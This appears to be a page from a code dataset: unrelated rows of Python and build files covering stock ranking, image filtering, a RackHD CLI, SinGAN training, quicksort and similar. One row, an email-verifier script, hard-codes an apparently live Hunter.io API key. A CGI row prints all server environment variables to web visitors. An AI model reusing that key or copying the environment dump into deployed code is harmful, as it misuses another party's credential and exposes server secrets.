def compute_pfcfrank(data):
    # rank key "PFCFRank" but read the raw value from "PFreeCashFlow"
    compute_somerank(data, "PFCF", "PFreeCashFlow")
def compute_bby(data):
    """Buyback yield (%) = buyback dollars / market cap; "MarketCap" is
    quoted in millions, hence the 1e6 factor."""
    for stock in [stock for stock in data.values() if "BB" in stock and "MarketCap" in stock]:
        stock["BBY"] = Decimal(stock["BB"])/(Decimal(stock["MarketCap"])*1000000)*100
    print "Done computing BBY"
def compute_shy(data):
    """Shareholder yield = dividend yield + buyback yield; a missing
    component simply contributes zero."""
    for stock in data.values():
        total = 0
        if "DividendYield" in stock:
            total += Decimal(stock["DividendYield"])
        if "BBY" in stock:
            total += stock["BBY"]
        stock["SHY"] = total
def compute_shyrank(data):
    # ascending: a higher shareholder yield earns a better (lower) rank
    compute_somerank(data, "SHY", reverse=False)
def compute_evebitdarank(data):
    # negative EV/EBITDA values are excluded from the ranking
    compute_somerank(data, "EVEBITDA", filterpositive=True)
def set_mediums(data):
    """Default every missing valuation rank to the 50th percentile; a stock
    with negative EV/EBITDA (excluded from ranking) also falls back to 50."""
    rank_bases = ("PE", "PS", "PB", "PFCF", "EVEBITDA")
    for stock in data.values():
        for base in rank_bases:
            stock.setdefault(base + "Rank", 50)
        if "EVEBITDA" in stock and stock["EVEBITDA"] < 0:
            stock["EVEBITDARank"] = 50
def compute_stockrank(data):
    """Composite value rank: the sum of the six individual percentile ranks."""
    components = ("PERank", "PSRank", "PBRank", "PFCFRank", "SHYRank", "EVEBITDARank")
    for stock in data.values():
        total = stock[components[0]]
        for name in components[1:]:
            total = total + stock[name]
        stock["Rank"] = total
def compute_overallrank(data):
    # ascending rank on the composite "Rank" (lower composite = better OVR)
    compute_somerank(data, "OVR", origkey="Rank", reverse=False)
def to_csv(data, output):
    """Write the snapshot to output/snapshot--<epoch>--<yy-mm-dd>.csv using
    stock_keys as the column order."""
    date = datetime.now()
    datestr = str(int(time.mktime(date.timetuple()))) + '--' + date.strftime('%y-%m-%d')
    with open(output+"/snapshot--"+datestr+".csv", "wb") as f:
        w = csv.DictWriter(f, stock_keys)
        # header written via the underlying writer (equivalent to writeheader())
        w.writer.writerow(stock_keys)
        w.writerows(data.values())
def csv_to_dicts(scsv):
    """Parse a CSV string into a list of dicts keyed by the header row.

    Non-ASCII characters are dropped; in dev mode (isDev()) only the first
    10 rows are returned.
    """
    scsv = scsv.encode('ascii', 'ignore')
    reader = csv.reader(StringIO.StringIO(scsv))
    header = []
    res = []
    for row in reader:
        if header:
            data = {}
            for i,val in enumerate(row):
                data[header[i]] = val
            res.append(data)
        else:
            # first row becomes the header
            header = row
    if(isDev()):
        res = res[:10]
    return res
def isDev(isdev=None):
    """Accessor for the module-wide dev-mode flag.

    Calling with a value stores it; the current flag is always returned.
    """
    if isdev is None:
        return isDev._isdev
    isDev._isdev = isdev
    return isDev._isdev
isDev._isdev = 0  # default: production mode
if __name__ == '__main__':
    # CLI: --dev caps the dataset at 10 rows, --output sets the target dir.
    try:
        opts, args = getopt.getopt(sys.argv[1:], ':', ['dev', 'output='])
    except getopt.GetoptError as err:
        print(err)
        sys.exit()
    print(opts)
    output = './snapshots'
    for o,a in opts:
        if o in ("--dev"):
            isDev(1)
        elif o in ("--output"):
            output = a
        else:
            print('unhandled op')
    generate_snapshot_to_csv(output)
|
12,984 | 73c5e7f80c74ceb29743e253f9b9769c64c3976b | # 2. lena ์์์ ์ด์ฉํ์ฌ ๊ฐ์ค ํ๊ท ๊ฐ ํํฐ๋ง์ ์ํํ์์ค.
# ๋ง์คํฌ๋ ๊ทธ๋ฆผ 4-7์ 3x3๊ณผ 5x5 ๋ง์คํฌ๋ฅผ ์ฌ์ฉํ์ฌ ๊ฐ๊ฐ์ ๊ฒฐ๊ณผ๋ฅผ ํ ํ๋ฉด์ ์ถ๋ ฅํ๊ณ , ์๋ณธ ์ด๋ฏธ์ง์ ๋น๊ตํ์์ค.
import numpy as np
from scipy import signal, misc
import matplotlib.pyplot as plt
from scipy import ndimage
def im_filtering(im, Filter, FilterSize):
    """Filter grayscale image *im* with the FilterSize x FilterSize mask
    *Filter* using zero padding; results are clipped to [0, 255] uint8."""
    rows, cols = im.shape
    pad = int(FilterSize / 2)
    # zero-padded working copy of the input
    padded = np.zeros(shape=(rows + 2 * pad, cols + 2 * pad), dtype=np.uint8)
    padded[pad:rows + pad, pad:cols + pad] = im[:, :]
    filtered = np.zeros(shape=(rows, cols), dtype=np.uint8)
    for r in range(rows):
        for c in range(cols):
            window = padded[r:r + 2 * pad + 1, c:c + 2 * pad + 1]
            value = np.sum(window * Filter)
            # clamp before the uint8 cast to avoid wraparound
            filtered[r, c] = np.uint8(np.where(value > 255, 255,
                                               np.where(value < 0, 0, value)))
    return filtered
# Image display helper.
def image_print(img, title, print_num, current_num):
    """Show *img* in grayscale at slot *current_num* of a
    print_num[0] x print_num[1] subplot grid."""
    print(print_num[0])  # NOTE(review): leftover debug print, kept for identical output
    rows, cols = print_num
    plt.subplot(rows, cols, current_num)
    plt.title(title)
    plt.gray()
    plt.imshow(img)
    plt.axis('off')
# Load the image, build the normalized weighted-average masks, filter, show.
lena = misc.imread('image/lena_256.bmp')  # NOTE: scipy.misc.imread needs an older scipy/Pillow
Weighted_Filter1 = np.array([[1, 2, 1], [2, 4, 2], [1, 2, 1]])
Weighted_Filter1 = Weighted_Filter1 / np.sum(Weighted_Filter1)
# Bug fix: the 5x5 Gaussian mask must be symmetric; the original had its
# last two rows swapped ([1,4,6,4,1] belongs on the bottom edge).
Weighted_Filter2 = np.array([[1, 4, 6, 4, 1],
                             [4, 16, 24, 16, 4],
                             [6, 24, 36, 24, 6],
                             [4, 16, 24, 16, 4],
                             [1, 4, 6, 4, 1]])
Weighted_Filter2 = Weighted_Filter2 / np.sum(Weighted_Filter2)
Image_New1 = im_filtering(lena, Weighted_Filter1, 3)
Image_New2 = im_filtering(lena, Weighted_Filter2, 5)
image_print(lena, "lena", (1, 3), 1)
image_print(Image_New1, "3X3", (1, 3), 2)
image_print(Image_New2, "5X5", (1, 3), 3)
plt.show()
12,985 | a9ca7f9cf7354113af8ce3e2c32adb16021aa419 | from task2.configs.const import SPEED_DIRECTORY_PLURAL
# get plural word by number
def plural(number, words):
    """Pick the plural form of *words* = (one, few, many) appropriate for
    *number*, following Slavic-style pluralization rules."""
    tens = number % 100
    units = number % 10
    if units == 1 and tens != 11:
        return words[0]
    if 2 <= units <= 4 and not 10 <= tens < 20:
        return words[1]
    return words[2]
# get plural for speed
def plural_speed(number, label):
    """Plural form for a speed value; when *label* has no entry in
    SPEED_DIRECTORY_PLURAL the number itself is returned unchanged."""
    forms = SPEED_DIRECTORY_PLURAL.get(label.name)
    if forms is None:
        forms = (number, number, number)
    return plural(number, forms)
|
12,986 | f5cfe6e9c245e3bacf72bf54f5a4000c9c6b9752 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
This script is a command line implementation for RackHD
'''
import os
import re
import json
import urlparse
from utils import rackhd_services as rackhd_services
from utils import arg_utils as arg_utils
from utils import arg_parser as arg_parser
from utils import local_utils as local_utils
from utils.mongo_utils import mongo as mongo
import http_request as http_request
#return a tuple with 0: recognized commands namespace and 1: unparsed commands
ARG_LIST, ARG_LIST_UNKNOWN = arg_parser.parse_arguments()
def operate_rackhd_service(operator, services):
    '''
    Operate RackHD services.

    *operator* selects the action (e.g. 'start' -> start_rackhd_services);
    *services* names the targets, with 'all' meaning every service.
    '''
    method_name = '{}_rackhd_services'.format(operator)
    target = None if services == 'all' else services
    manager = rackhd_services.RackhdServices(target)
    getattr(manager, method_name)()
def parse_api_options(args):
    '''
    Parse API operation options into an HTTP request description.
    :param <Object> args: Parsed RackHD CLI arguments
    :return: dict with method, url, header and payload keys
    '''
    # hard-wired RackHD southbound address
    address = {
        'server': '172.31.128.1',
        'port': '9090',
        'protocol': 'http'
    }
    # Example api /api/current/nodes/<id>/workflows/action
    api = {
        'opr': args.opr or 'nodes',
        'id': args.identity or '',
        'subopr': args.subopr or '',
        'param': args.param or ''
    }
    api_ver = args.ver or 'current'
    api_string = 'api'
    query = ''
    #if args.header and args.header != 'application/json':
        #header = args.header
    #else:
        #header = {'content-type': 'application/json'}
    options = {
        'method': args.method,
        # GET, DELETE don't require header
        'url': None,
        'header': args.header,
        'payload': args.payload or ''
    }
    url_path = '/{}/{}'.format(api_string, api_ver)
    if args.api: # User can specify api url
        url_path = os.path.join(url_path, args.api)
    else:
        url_path = os.path.join(url_path, api['opr'], api['id'], api['subopr'], api['param'])
    # os.path.join leaves a trailing slash when the trailing parts are empty
    if url_path.endswith('/'):
        url_path = url_path[:-1]
    netloc = '{}:{}'.format(address['server'], address['port'])
    # --graph is shorthand for a name=<graph> query string
    if args.graph:
        args.query = 'name={}'.format(args.graph)
    if args.query:
        query = args.query
    url = urlparse.urlunparse((
        address['protocol'], # scheme
        netloc,
        url_path, #path
        '', #params
        query, #query
        False #fragment
    ))
    options['url'] = url
    return options
def parse_position_args(unknown_args, known_args):
    '''
    Parse and combine all arguments
    :param unknown_args: tuple from argparse parse_known_args methods
    :param known_args: NameSpace object from argparse parse_known_args methods
    '''
    # Supported unknown commands
    arg = unknown_args[0]
    pattern = re.compile("^[a-z0-9]{24}$")
    if pattern.match(arg):
        # a 24-char lowercase token is treated as a node/document identity
        parser = getattr(arg_utils, 'parse_position_identity_args')
    else:
        # Fix: 'sku' appeared twice in the original whitelist; deduplicated.
        assert arg in ['node', 'sku', 'service', 'test', 'install',
                       'log', 'config', 'mongo'], \
            'Position argument {} is not supported'.format(arg)
        parser = getattr(arg_utils, 'parse_position_{}_args'.format(arg))
    args = parser(unknown_args, known_args)
    return args
def api_output_view(result, args, options):
    """
    Print the API response as a JSON-ish line including the request that
    produced it and the HTTP status code.
    """
    content = {}
    if args.min:
        # --min: project each result item down to the fields whitelisted in
        # payload_min.json for the current operation
        payload_config = local_utils.get_configurations('payload_min.json')
        items = payload_config[args.opr]
        print type(items)  # NOTE(review): leftover debug output
        for value in result.content:
            print value  # NOTE(review): leftover debug output
            for item in items:
                content[item] = value[item]
    else:
        content = result.content
    print "{{\"data\": {}, \"_api\": \"-X {} -H {} {}\", \"_status\": {}}}".format(
        content or "\"\"", options["method"], options["header"],
        result.url, result.status_code
    )
def run():
    """
    Dispatch the parsed CLI arguments: service control, mongo lookup, or a
    generic REST API request against RackHD.
    """
    arg_utils.parse_all_known(ARG_LIST)
    if ARG_LIST_UNKNOWN:
        parse_position_args(ARG_LIST_UNKNOWN, ARG_LIST)
    if ARG_LIST.service:
        # start/stop/restart one service or 'all'
        arg_utils.parse_position_service_args(ARG_LIST_UNKNOWN, ARG_LIST)
        operate_rackhd_service(ARG_LIST.service, ARG_LIST.services)
    elif ARG_LIST.test:
        pass  # NOTE(review): not implemented yet
    elif ARG_LIST.log:
        pass  # NOTE(review): not implemented yet
    elif ARG_LIST.mongo:
        print mongo.find_doc_by_id(ARG_LIST.mongo)
    elif ARG_LIST.opr:
        # generic REST passthrough
        options = parse_api_options(ARG_LIST)
        res = http_request.request(options)
        api_output_view(res, ARG_LIST, options)
if __name__ == '__main__':
    run()
|
12,987 | 2000ebdf8b0a62e84513ee58bbaba09bbc842813 | Import('env')
terminal_lib = env.Library('terminal', Glob('*.c'))
Return('terminal_lib')
|
12,988 | 6e6ca48dcd75d827fba7af4242c82070409200c0 | prompt = "Welcome to Pizza-O's! Type in any topping: "
prompt += "\nType 'quit' if you're done adding toppings."
topping = ""
toppings = []
while topping != 'quit':
topping = input(prompt)
toppings.append(topping)
if topping != 'quit':
print("We'll throw " + topping.title() + " on your pizza! Want any more?")
else:
print("Thanks! We'll get your order ready!")
print('These are your toppings!')
for top in toppings:
if top != 'quit':
print(top.title())
|
12,989 | 5145c410c341888fd433ca0990287d4cd93a09c8 | from django.shortcuts import render
from ProgramApp.models import program_registration
# Create your views here.
# NOTE(review): this module-level dict is shared across requests (it is not
# thread-safe); kept for interface compatibility with the rest of the app.
response = {}
def donation(request):
    """Render the donation list page: the visitor's name, their program
    registrations (matched by session email) and the donation total."""
    if request.user.is_authenticated:
        strNama = request.user.first_name + " " + request.user.last_name
        strNama = strNama.strip()
        request.session['name'] = strNama
        request.session['email'] = request.user.email
        response['nama'] = request.session['name']
    else:
        response['nama'] = ''
    # Bug fix: anonymous visitors without a stored email no longer raise
    # KeyError on the session lookup; they simply match no registrations.
    email = request.session.get('email', '')
    donasi = program_registration.objects.filter(email=email)
    jumlahDonasi = 0
    for data in donasi:
        jumlahDonasi += data.jumlah_uang
    response['jumlahDonasi'] = jumlahDonasi
    response['donationlist'] = donasi
    return render(request, 'donationlist.html', response)
|
12,990 | 2e7b31e23034a4f3ea6a4e188a7cd4ffb1c9dbcd | from reversi_status import TeamType
from reversi_status import ReversiStatus
import reversi_ai
import reversi_user
import copy
# Place the standard four opening stones in the board center.
stoneInitList = [[3,3,TeamType.WHITE], [3,4,TeamType.BLACK], [4,3,TeamType.BLACK], [4,4,TeamType.WHITE]]
status = ReversiStatus()
status.FillStone(TeamType.NOTEAM)
for l in stoneInitList:
    status.setStone(l[0], l[1], l[2])
# Black plays a depth-3 AI; White a depth-1 AI.
mPlayers = {
    TeamType.BLACK: reversi_ai.ReversiAI(3),
    TeamType.WHITE: reversi_ai.ReversiAI(1)
}
while not status.isFineshed():
    print(str(status))  # draw the board
    # fetch the list of legal squares; pass the turn when there is none
    l = status.getPutableList()
    if len(l) == 0:
        status.passPlayer()
        continue
    # the AI receives a deep copy so its search cannot mutate the real board
    cmd = mPlayers[status.getCurrentPlayer()].think(copy.deepcopy(status))
    if cmd[0] == 'quit':
        break
    elif cmd[0] == 'put':
        x = cmd[1]
        y = cmd[2]
        status.putStone(x,y)
    elif cmd[0] == 'do_over':
        # undo two plies (both players' last moves)
        if status.getChangeLogLen() >= 2:
            status.doOver()
            status.doOver()
# Final score and winner announcement.
print("result")
b = status.getBlackStoneAmount()
w = status.getWhiteStoneAmount()
print(str(TeamType.BLACK) + " = " + str(b))
print(str(TeamType.WHITE) + " = " + str(w))
winner = ""
if b > w:
    winner = str(TeamType.BLACK)
elif b < w:
    winner = str(TeamType.WHITE)
else:
    winner = "Draw"
print("Winner = " + winner)
input("Enterใง็ตไบ>>")
12,991 | 90d7be83fb4b3113793cc0cb5bbf40cc035b9b1d | #!/Python36/python
import os
# Minimal CGI script: emit the HTTP header, then list every environment
# variable as simple HTML.
print("Content-type: text/html")
print()
print("<font size=+1>Envirn</font></br>")
for param in os.environ.keys():
    print("<b>%20s</b>: %s</br>" %(param, os.environ[param]))
12,992 | 39a4d3f1d3725ebd34a3b9436e43e3008f95874d | from pm4py.objects.conversion.heuristics_net import factory, versions
|
12,993 | 592b9f1ca519db84a01e4d366c22e7ddef6ac5a7 | import unittest
import expressy
from expressy import expression, value
class ExpressyTest(unittest.TestCase):
    """Unit tests for the expressy expression parser."""

    def test_units(self):
        # Plain parse evaluates bare arithmetic; unit-suffixed literals need
        # parse_with_units and yield a quantity with .units and .magnitude.
        self.assertEqual(expressy.parse('23 + 5')(), 28)
        with self.assertRaises(SyntaxError):
            expressy.parse('23Hz + 5Hz')
        v = expressy.parse_with_units('23Hz + 5Hz')()
        self.assertEqual(v.units, '1 / second')
        self.assertEqual(v.magnitude, 28)

    def test_variable(self):
        # Non-constant symbols must be re-resolved on every evaluation, so a
        # later mutation of `bar` is visible through the compiled expression.
        bar = ['NO']
        def is_constant(name):
            return name != 'foo'
        def symbols(name):
            if name == 'foo':
                return lambda: bar[0]
            raise ValueError()
        maker = expression.Maker(is_constant, symbols)
        expr = maker('foo()')
        self.assertFalse(isinstance(expr, value.Value))
        self.assertEqual(expr(), 'NO')
        bar[0] = 'YES'
        self.assertEqual(expr(), 'YES')
|
12,994 | 71fdac490d5b0c11f6d6e93af5c5adb5a9b89c7a | import numpy as np
import nnabla as nn
import math
import os
from model import Model
from helper import imread, imwrite, imresize, imrescale, create_real_images
from helper import normalize, denormalize, save_pkl, rescale_generated_images
from nnabla.monitor import Monitor, MonitorSeries, MonitorImage
from nnabla.utils.image_utils import set_backend
def train(args):
    """Train the multi-scale SinGAN pyramid.

    Builds the real-image pyramid, trains one (G, D) pair per scale from
    coarse to fine, and saves model weights, the reconstruction noises (Zs)
    and per-scale noise amplitudes under args.logdir.
    Returns (Zs, reals, noise_amps).
    """
    # create real images
    reals = create_real_images(args)
    # save real images
    for i, real in enumerate(reals):
        image_path = os.path.join(args.logdir, 'real_%d.png' % i)
        imwrite(denormalize(np.transpose(real, [0, 2, 3, 1])[0]), image_path)
    # nnabla monitor
    monitor = Monitor(args.logdir)
    # use cv2 backend at MonitorImage
    set_backend('cv2')
    prev_models = []
    Zs = []
    noise_amps = []
    for scale_num in range(len(reals)):
        # feature counts double every 4 scales, capped at 128
        fs = min(args.fs_init * (2 ** (scale_num // 4)), 128)
        min_fs = min(args.min_fs_init * (2 ** (scale_num // 4)), 128)
        model = Model(real=reals[scale_num], num_layer=args.num_layer, fs=fs,
                      min_fs=min_fs, kernel=args.kernel, pad=args.pad,
                      lam_grad=args.lam_grad, alpha_recon=args.alpha_recon,
                      d_lr=args.d_lr, g_lr=args.g_lr, beta1=args.beta1,
                      gamma=args.gamma, lr_milestone=args.lr_milestone,
                      scope=str(scale_num))
        z_curr = train_single_scale(args, scale_num, model, reals,
                                    prev_models, Zs, noise_amps, monitor)
        prev_models.append(model)
        Zs.append(z_curr)
        noise_amps.append(args.noise_amp)
    # save data
    nn.save_parameters(os.path.join(args.logdir, 'models.h5'))
    save_pkl(Zs, os.path.join(args.logdir, 'Zs.pkl'))
    save_pkl(reals, os.path.join(args.logdir, 'reals.pkl'))
    save_pkl(noise_amps, os.path.join(args.logdir, 'noise_amps.pkl'))
    return Zs, reals, noise_amps
def train_single_scale(args, index, model, reals,
                       prev_models, Zs, noise_amps, monitor):
    """Train the (G, D) pair at pyramid scale *index*.

    Alternates args.d_steps discriminator updates with args.g_steps
    generator updates for args.niter epochs, logging losses and a sample
    image per epoch. Returns z_opt, the reconstruction noise for this scale.
    """
    # prepare log monitors
    monitor_train_d_real = MonitorSeries('train_d_real%d' % index, monitor)
    monitor_train_d_fake = MonitorSeries('train_d_fake%d' % index, monitor)
    monitor_train_g_fake = MonitorSeries('train_g_fake%d' % index, monitor)
    monitor_train_g_rec = MonitorSeries('train_g_rec%d' % index, monitor)
    monitor_image_g = MonitorImage('image_g_%d' % index, monitor, interval=1,
                                   num_images=1, normalize_method=denormalize)
    real = reals[index]
    ch, w, h = real.shape[1], real.shape[2], real.shape[3]
    # training loop
    for epoch in range(args.niter):
        d_real_error_history = []
        d_fake_error_history = []
        g_fake_error_history = []
        g_rec_error_history = []
        # coarsest scale uses 1-channel noise; later scales full-channel noise
        if index == 0:
            z_opt = np.random.normal(0.0, 1.0, size=(1, 1, w, h))
            noise_ = np.random.normal(0.0, 1.0, size=(1, 1, w, h))
        else:
            z_opt = np.zeros((1, ch, w, h))
            noise_ = np.random.normal(0.0, 1.0, size=(1, ch, w, h))
        # discriminator training loop
        for d_step in range(args.d_steps):
            # previous outputs
            if d_step == 0 and epoch == 0:
                if index == 0:
                    prev = np.zeros_like(noise_)
                    z_prev = np.zeros_like(z_opt)
                    args.noise_amp = 1
                else:
                    prev = _draw_concat(args, index, prev_models, Zs, reals,
                                        noise_amps, 'rand')
                    z_prev = _draw_concat(args, index, prev_models, Zs,
                                          reals, noise_amps, 'rec')
                    # scale noise amplitude by the reconstruction error
                    rmse = np.sqrt(np.mean((real - z_prev) ** 2))
                    args.noise_amp = args.noise_amp_init * rmse
            else:
                prev = _draw_concat(args, index, prev_models, Zs, reals,
                                    noise_amps, 'rand')
            # input noise
            if index == 0:
                noise = noise_
            else:
                noise = args.noise_amp * noise_ + prev
            fake_error, real_error = model.update_d(epoch, noise, prev)
            # accumulate errors for logging
            d_real_error_history.append(real_error)
            d_fake_error_history.append(fake_error)
        # generator training loop
        # NOTE(review): `noise`, `prev` and `z_prev` carry over from the
        # discriminator loop above; with args.d_steps == 0 they would be
        # unbound — confirm d_steps >= 1 is guaranteed by the CLI defaults.
        for g_step in range(args.g_steps):
            noise_rec = args.noise_amp * z_opt + z_prev
            fake_error, rec_error = model.update_g(epoch, noise, prev,
                                                   noise_rec, z_prev)
            # accumulate errors for logging
            g_fake_error_history.append(fake_error)
            g_rec_error_history.append(rec_error)
        # save errors
        monitor_train_d_real.add(epoch, np.mean(d_real_error_history))
        monitor_train_d_fake.add(epoch, np.mean(d_fake_error_history))
        monitor_train_g_fake.add(epoch, np.mean(g_fake_error_history))
        monitor_train_g_rec.add(epoch, np.mean(g_rec_error_history))
        # save generated image
        monitor_image_g.add(epoch, model.generate(noise, prev))
    return z_opt
def _draw_concat(args, index, prev_models, Zs, reals, noise_amps, mode):
G_z = np.zeros_like(reals[0])
if index > 0:
pad_noise = int(((args.kernel - 1) * args.num_layer) / 2)
for i in range(index):
Z_opt = Zs[i]
real_curr = reals[i]
real_next = reals[i + 1]
noise_amp = noise_amps[i]
if mode == 'rand':
if i == 0:
z_shape = (1, 1) + real_curr.shape[2:]
else:
z_shape = (1,) + real_curr.shape[1:]
z = np.random.normal(0.0, 1.0, size=z_shape)
Z_in = noise_amp * z + G_z
elif mode == 'rec':
Z_in = noise_amp * Z_opt + G_z
else:
raise Exception
# generate image with previous output and noise
G_z = prev_models[i].generate(Z_in, G_z)
G_z = rescale_generated_images(G_z, 1 / args.scale_factor)
G_z = G_z[:, :, 0:real_next.shape[2], 0:real_next.shape[3]]
return G_z
|
12,995 | f5820ad2e7f3945dc4817a9ebf165848a8fabfc1 | import random
import numpy as np
class KnowledgeGraph:
    """Knowledge-graph triplet store with positive/negative batch iterators.

    Triplets are loaded from ``kg_tuple.npy`` / ``kg_tuple_neg.npy`` under
    ``data_dir``; each row looks like ``[e1, e2, r_w1, r_w2, ...]``.
    """

    def __init__(self, data_dir):
        self.data_dir = data_dir
        self.n_entity = 0
        self.n_triplet = 0
        self.w_triplet = []
        # Placeholders kept for backward compatibility with any external
        # code that inspects them; not populated by this class.
        self.w_triplet_ = []
        self.neg_w_triplet = []
        self.all_e1e2 = []
        self.all_e1 = []
        self.all_e2 = []
        self.load_triplet()

    def load_triplet(self):
        """Load positive and negative triplet arrays from ``data_dir``.

        Uses context managers so the file handles are closed even when
        ``np.load`` raises (the original left them open on error).
        """
        with open(self.data_dir + 'kg_tuple.npy', 'rb') as fle:
            # e.g., [[e1, e2, r_w1, r_w2, ...], ...]
            self.w_triplet = np.load(fle)
        with open(self.data_dir + 'kg_tuple_neg.npy', 'rb') as fle_neg:
            self.neg_w_triplet = np.load(fle_neg)
        self.n_triplet = self.w_triplet.shape[0]

    def _shuffled_batches(self, data, batch_size):
        """Yield rows of ``data`` in a fresh random order, ``batch_size`` at a time.

        The final batch may be shorter than ``batch_size``.
        """
        order = np.random.permutation(self.n_triplet)
        for start in range(0, self.n_triplet, batch_size):
            yield np.array([data[i] for i in order[start:start + batch_size]])

    def next_pos_batch(self, batch_size):
        """Yield shuffled batches of positive triplets."""
        return self._shuffled_batches(self.w_triplet, batch_size)

    def next_neg_batch(self, batch_size):
        """Yield shuffled batches of negative triplets.

        NOTE: the permutation is drawn independently of ``next_pos_batch``'s,
        matching the original behavior.
        """
        return self._shuffled_batches(self.neg_w_triplet, batch_size)
|
12,996 | 8c67819c53aa2ef9431915260b2fb09dad19872f | # https://api.hunter.io/v2/email-verifier?email=shivam@cez.co.in&api_key=27ad6b2410afdd93b82abc5b6e48384f942c952d
import requests

# SECURITY NOTE(review): this API key is hard-coded and effectively public
# once committed — move it to an environment variable and rotate the key.
API_KEY = "27ad6b2410afdd93b82abc5b6e48384f942c952d"


def main():
    """Prompt for an e-mail address and print Hunter.io's verification verdict."""
    email = input("Enter Mail ID- ")
    # Pass the address via ``params`` so requests URL-encodes user input
    # instead of pasting it raw into the URL.
    response = requests.get(
        "https://api.hunter.io/v2/email-verifier",
        params={"email": email, "api_key": API_KEY},
    )
    # Fail loudly on HTTP errors rather than with an obscure KeyError below.
    response.raise_for_status()
    payload = response.json()
    print(payload["data"]["result"])


if __name__ == "__main__":
    main()
12,997 | f9fe51d022f1bced8d45232e4c9cbe78893002f9 | """Implement quick sort
>>> quickSort([3,5,6,1,2,8])
[1, 2, 3, 5, 6, 8]
>>> quickSort([1,2,3])
[1, 2, 3]
>>> quickSort([])
[]
>>> quickSort([3,5,6,1,2,3,2,8])
[1, 2, 2, 3, 3, 5, 6, 8]
"""
def quickSort(arr):
    """Return a sorted list using three-way quicksort (duplicates preserved)."""
    # Base case: zero or one element is already sorted.
    if len(arr) < 2:
        return arr
    pivot = arr[len(arr)//2]
    # Partition into strictly-smaller, equal, and strictly-larger buckets.
    smaller = [item for item in arr if item < pivot]
    equal = [item for item in arr if item == pivot]
    larger = [item for item in arr if item > pivot]
    return quickSort(smaller) + equal + quickSort(larger)
if __name__ == '__main__':
    # Run the doctests embedded in the module docstring; celebrate only
    # when every example passed.
    import doctest
    if doctest.testmod().failed == 0:
        print('You sort it!')
12,998 | 6f7a26d556e48c1941a07d9417ddb7e377f92345 | slow = 1000
fast = 1
year = 1
while fast < slow:
slow += slow
fast += fast
year += 1
slow -= 0.4*slow
fast -= 0.3*fast
print year, slow, fast
if(fast>=slow):
print year
|
12,999 | b950752471fe5760acd11b1e5e0264713da7af8a | #! /usr/bin/env python
# encoding: UTF-8
"""Smoke-test scratch-directory creation/removal, then exit with status 1."""
import os
import sys


def main():
    """Create a 'test' directory, list the cwd, clean up, and exit non-zero."""
    os.mkdir('test')
    try:
        print(os.listdir("."))
    finally:
        # Always remove the scratch directory, even if listing/printing
        # fails (the original leaked it on error).
        os.rmdir('test')
    print("")
    # Preserved from the original script. NOTE(review): confirm the
    # non-zero exit status is intentional; 0 conventionally means success.
    sys.exit(1)


if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.